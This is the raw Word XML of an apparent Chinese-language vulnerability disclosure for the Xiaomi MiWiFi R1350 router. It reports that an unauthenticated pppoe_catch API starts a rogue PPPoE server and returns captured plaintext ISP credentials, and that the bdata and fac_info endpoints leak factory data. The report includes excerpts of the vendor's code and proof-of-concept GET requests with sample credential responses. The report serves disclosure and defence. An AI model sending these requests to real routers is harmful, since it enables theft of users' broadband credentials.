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F5E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spacing w:val="0"/>
          <w:sz w:val="42"/>
          <w:szCs w:val="42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42"/>
          <w:szCs w:val="42"/>
          <w:bdr w:val="none" w:color="auto" w:sz="0" w:space="0"/>
          <w:shd w:val="clear" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>小米 MiWiFi R1350 路由器</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73269C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厂商：小米（Xiaomi）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="608FD9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产品：小米 AIoT 路由器 R1350（AC1200）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E244D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固件版本：1.0.31（miwifi_r1350_firmware_7449d_1.0.31.bin，QSDK / OpenWrt，MIPS32 大端）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4961AE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漏洞类型：未授权 PPPoE 凭据捕获 / 敏感信息泄露（CWE-200 / CWE-319）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02E1C8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概述</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BFF0D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小米 MiWiFi R1350（固件 1.0.31）暴露了一个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无需认证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的诊断接口（标志位 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="9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0x09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= noauth + noinit），该接口会在 WAN/LAN 接口上启动一个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恶意 PPPoE 服务器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，并将捕获到的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明文 PPPoE 拨号凭据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通过 HTTP 响应返回：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="095EE2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GET /cgi-bin/luci/api/xqnetwork/pppoe_catch HTTP/1.1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14B2E6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漏洞详情</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="553765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/usr/lib/lua/luci/controller/api/xqnetwork.lua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以标志位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0x09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注册了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pppoe_catch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（约第 112 行），并调用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XQLanWanUtil.pppoeCatch(50)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。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D439F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3675" cy="1804035"/>
            <wp:effectExtent l="0" t="0" r="317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64E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/usr/lib/lua/xiaoqiang/util/XQLanWanUtil.lua:1352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97DF3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1770" cy="4147820"/>
            <wp:effectExtent l="0" t="0" r="508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CF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local pppoe = LuciUtil.execl("/usr/sbin/pppoe-catch start "..tostring(timeout))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F3288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...</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D3B11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if LuciUtil.trim(value):match("PPPoE:") then</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="038826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local pppoename = pppoe[index + 1] -- 捕获到的 PAP 用户名</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CD2C8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local pppoepasswd = pppoe[index + 2] -- 捕获到的 PAP 密码（明文）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22E5F5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3675" cy="4208145"/>
            <wp:effectExtent l="0" t="0" r="3175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04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/usr/sbin/pppoe-catch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（shell 脚本）执行：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AA705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2405" cy="4160520"/>
            <wp:effectExtent l="0" t="0" r="444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AE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pppoe-server -I &lt;wan_ifname&gt; -I br-lan -k -S xiaomi</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5708C9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# 最长等待 &lt;timeout&gt; 秒，然后：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DA0CE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[ -f $PAP_FILE ] &amp;&amp; echo "Service-Name: $(cat /tmp/state/pppoe-service-name)"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58E261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echo "PPPoE:"; echo "$(cat /tmp/state/pppoe-server-pap)" # 明文 PAP 凭据</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C4F6D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桥接 LAN 上的任意 PPPoE 客户端（例如自动重拨“宽带连接”的 PC、配置错误的二级路由器）只要在窗口期内发出 PADI，就会使用 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PAP（明文）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向这个恶意服务器认证；凭据随即落入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/tmp/state/pppoe-server-pap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，并被原样返回给未授权的 HTTP 调用者。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E12A7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bdataInfo()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XQSysUtil.lua:1056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）同样在未授权情况下执行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bdata show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并返回出厂分区的所有键值（序列号、国家码、出厂模式标志）；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fac_info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则返回安全相关的设备状态（telnet/ssh/uart 开启标志、出厂模式、SSID）。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E28A0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漏洞证明（PoC）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69B1D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GET /cgi-bin/luci/api/xqnetwork/pppoe_catch HTTP/1.1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5929A2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Host: 192.168.31.1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="666B13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​</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="536ED9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响应（在 50 秒窗口期内捕获到 PAP 交换时）：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B76D7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{"passwd":"TxPppoe#2024","service":"CT-Beijing-01","name":"0755_op_po","code":0}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6ADEDD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GET /cgi-bin/luci/api/xqsystem/bdata HTTP/1.1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44E7F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Host: 192.168.31.1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AE217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​</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24E76C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{" CountryCode":"CN","wl0_ssid":"Xiaomi_POC_5G","SN":"H2D0901907235","factory":"RTYPE RCC"}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="600706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影响</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A1B54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未授权的 LAN 侧攻击者可以把路由器本身变成一台凭据收割用的 PPPoE 服务器，从而窃取用户的 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ISP 宽带用户名和密码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（PAP 明文）。宽带凭据可在 ISP 侧被复用（盗用宽带套餐，视运营商而定还可能涉及语音/邮箱访问）。此外，恶意服务器动作在捕获窗口期内还会干扰正常的 WAN 连接。</w:t>
      </w:r>
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="0"/>
    </w:p>
    <w:p w14:paraId="7756A3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复现结果</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1907AE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598160" cy="49276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C4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 xml:space="preserve">已在 qemu-mips + chroot 模拟的固件环境中（原始 nginx → fcgi-cgi → LuCI 栈，且存在真实的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3F4F4"/>
        </w:rPr>
        <w:t>pppoe-server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 xml:space="preserve"> 二进制）动态验证。在存在已捕获 PAP 状态文件的情况下，该接口如上图所示在 HTTP 响应中返回了明文凭据；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3F4F4"/>
        </w:rPr>
        <w:t>bdata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 xml:space="preserve"> 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3F4F4"/>
        </w:rPr>
        <w:t>fac_info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 xml:space="preserve"> 的响应同样无需任何会话令牌即可获取。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="408CC2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8C989"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="EB98C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F2092"/>
    <w:rsid w:val="284502B4"/>
    <w:rsid w:val="52F52E3D"/>
    <w:rsid w:val="734A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b/>
      <w:bCs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2025-02-10T06:03:00Z</dcterms:created>
  <dc:creator>11226</dc:creator>
  <cp:lastModifiedBy>cinqseptfive</cp:lastModifiedBy>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-08-17T02:09:11Z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783E61DC5BDD4CA294A964ED3C1204EC_12</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="4" name="KSOTemplateDocerSaveRecord">
    <vt:lpwstr>eyJoZGlkIjoiYjkyZmNhZmMwYTRkMzdjNDc0ZDBiODA4ZTNmNjg2YzYiLCJ1c2VySWQiOiIxNDQ5MzUxNjY0In0=</vt:lpwstr>
  </property>
</Properties>
</file>